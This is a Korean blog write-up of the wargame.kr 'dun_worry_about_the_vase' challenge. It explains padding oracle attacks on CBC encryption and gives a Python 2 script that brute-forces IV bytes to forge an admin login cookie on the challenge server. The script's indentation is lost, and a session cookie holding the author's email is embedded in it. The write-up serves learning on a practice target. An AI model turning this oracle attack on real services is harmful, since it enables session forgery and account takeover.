문제에 접근하면 padding oracle vulnerability에 대해 알고 있는지 물어본다.
해당 기법을 이용하여 문제를 해결해야 한다는 것을 알 수 있다.
해당 기법에 대해서는 아래 블로그에 설명이 잘 나와있다.
해당 블로그를 참고하여 패딩 오라클 에 대해 잘 숙지하고 문제에 접근해보자.
한마디로 정리하자면 오라클이란 올바른지 확인하는 것이라 생각하면 되고 이에 따라 패딩 오라클이란 암호화된 값을 복호화했을 때 패딩이 올바르게 되어 있는지 확인해주는 것이다.
암호화된 값을 복호화과정 없이 변조가 가능하다는 것이 크리티컬한데 그 과정을 간단히 설명하면 암호화된 값을 복호화하면 IV(Initialization Vector)와 평문을 Xor한 값이 나오고 여기에 IV를 Xor하면 평문이 나온다. 단, 우리는 키 값을 모르기 때문에 복호화를 진행할 수가 없으므로 IV의 값을 바꿔가며 IV와 평문을 Xor한 값을 찾고 이를 통해 평문값을 찾을 수 있으며 변조까지 가능하다.
참고) 서버측에서는 PlainText의 padding이 잘 되어있다면 padding이 잘못되어 있을 때와 다른 응답을 보낸다.
암호화 경우 |
서버측 응답 |
정상적인 암호문 |
200 OK |
비정상적인 암호문 | 500 Internal Server Error |
정상적인 암호문 + 복호화 시 비정상적인 데이터 |
Custom Error message 200 OK 혹은 404 Not Found |
이 취약점은 ASP.NET에서 세션을 변조할 수 있는 취약점으로 나온지가 꽤 된 취약점으로 RealWorld에서는 자주 발견되기 힘들 것으로 보이긴합니다. (워낙 크리티컬해야지;;)
해당 문제에 접근하면 guest와 그에 해당하는 패스워드가 적혀있는데 로그인을 하면 아래와 같이 admin의 세션을 얻는 것이 목표라고 말하고 있다.
버프를 통해 세션값을 얻어보면 아래와 같이 L0g1n이라는 쿠키값이 참 의심스럽게 생겼다.
해당 값의 길이를 세어보니 총 24바이트로 12바이트씩 블럭이 되어있음을 예상할 수 있다.
해당 값의 앞 블럭의 값을 바꿔보면 invalid user 라는 에러가 뜨고 뒷 블럭의 마지막 값을 바꾸면 padding error라는 에러가 뜸을 볼 수 있다.
일단 뒷 블럭의 마지막 값을 바꿔가며 브루트포싱을 하여 invalid user가 나오는 값이 무엇인지 00~FF를 넣어보자.
후.... 더러운 코드지만 잘 될줄 알았지만 값을 넣어도 안되네 ㅠㅠ
import urllib
import urllib2
from urllib import quote,unquote
import base64
url='http://wargame.kr:8080/dun_worry_about_the_vase/login_ok.php'
data = {"id":"guest","ps":"guest"}
data = urllib.urlencode(data)
request = urllib2.Request(url,data)
request.add_header("Cookie", "ci_session=a%3A10%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%228a1e8bd46581d8503958676735c11a70%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A8%3A%2210.0.2.2%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A114%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F66.0.3359.139+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1525236407%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A8%3A%22R00t%40ble%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22air0700%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228850%22%3B%7Debaa3718c2c73df7bab9171deca20b7994ca8280")
response = urllib2.urlopen(request)
headers = response.info().headers
data = response.read()
for s in headers:
if "Set-Cookie" in s:
Llocation = s.find("L0g1n")
Rlocation = s.find("\r")
#print s[Llocation+6:Rlocation]
Key = s[Llocation+6:Rlocation]
url2='http://wargame.kr:8080/dun_worry_about_the_vase/main.php'
request2=urllib2.Request(url2)
Key1 = unquote(Key[0:Key.find("%3D")+3]) #urldecodeing
#print Key1
Key2 = unquote(Key[Key.find("%3D")+3:]) #urldecodeing
#print Key2
hexKey1 = (base64.decodestring(Key1)).encode("hex")
# print hexKey1
hexKey2 = (base64.decodestring(Key2)).encode("hex")
iv="0000000000000000"
iv_Temp = iv
for j in range(1,9):
for i in range(0,256):
iv_Temp = iv_Temp[:-2*j]+format(i,'02x')+iv_Temp[16-2*(j-1):]
print iv_Temp
result = base64.encodestring(iv_Temp.decode("hex"))+Key2
result = result.replace("\n","")
#print result
request2.add_header("Cookie","L0g1n="+result+"; ci_session=a%3A10%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%228a1e8bd46581d8503958676735c11a70%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A8%3A%2210.0.2.2%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A114%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F66.0.3359.139+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1525236407%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A8%3A%22R00t%40ble%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22air0700%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228850%22%3B%7Debaa3718c2c73df7bab9171deca20b7994ca8280")
response = urllib2.urlopen(request2)
data = response.read()
print format(i,'02x')+" : " +data
if(data.find("invalid user")!=-1):
print str(j) + "'s result=" +result
#hexKey1 = hexKey1[:-2*j]+hex(i^(j+1))[-2:]+hexKey1[16-2*(j-1):]
iv= iv[:-2*j]+format(i^j,'02x')+iv[16-2*(j-1):]
print "[+]iv= " + iv
if(j==1):
iv_Temp = iv[:-2*j]+format((i^j)^(j+1),'02x')
elif(j==8):
print "[+]iv_Temp = " + iv_Temp
print "[+]IV = " + hexKey1
print "[+]encrypted Text = " + hexKey2
break
else:
Temp = ''
for k in range(j+1,1,-1):
print "jjjjj: " + str(j)
Temp += format(int(iv[16-2*(k-1):16-2*(k-2)],16)^(j+1),'02x')
iv_Temp = iv_Temp[:-2*j]+Temp
print "[+]iv_Temp = " + iv_Temp
break
#print "[+]decrypted Text = " + iv_Temp ^ hexKey1
술먹고 집가다가 갑자기 깨달음이 ㅋㅋㅋㅋ
코드 결과 나온 값은 hex값이므로 디코딩 후 base64로 인코딩해줘야 답이 된다.
클리어~
참고 )
- https://m.blog.naver.com/PostView.nhn?blogId=wlstngus0504&logNo=220392135701&proxyReferer=https%3A%2F%2Fwww.google.co.kr%2F
- http://bperhaps.tistory.com/entry/%EC%98%A4%EB%9D%BC%ED%81%B4-%ED%8C%A8%EB%94%A9-%EA%B3%B5%EA%B2%A9-%EA%B8%B0%EC%B4%88-%EC%84%A4%EB%AA%85-Oracle-Padding-Attack
'Solve Problem' 카테고리의 다른 글
| [SuNiNaTaS] 7번 문제 (0) | 2018.05.10 |
|---|---|
| [wargame.kr] QnA (0) | 2018.05.06 |
| [RedTiger's Hackit] 올클리어 (0) | 2018.02.03 |
| [RedTiger's Hackit] 10번 문제 (0) | 2018.02.03 |
| [RedTiger's Hackit] 9번 문제 (0) | 2018.02.01 |
rootable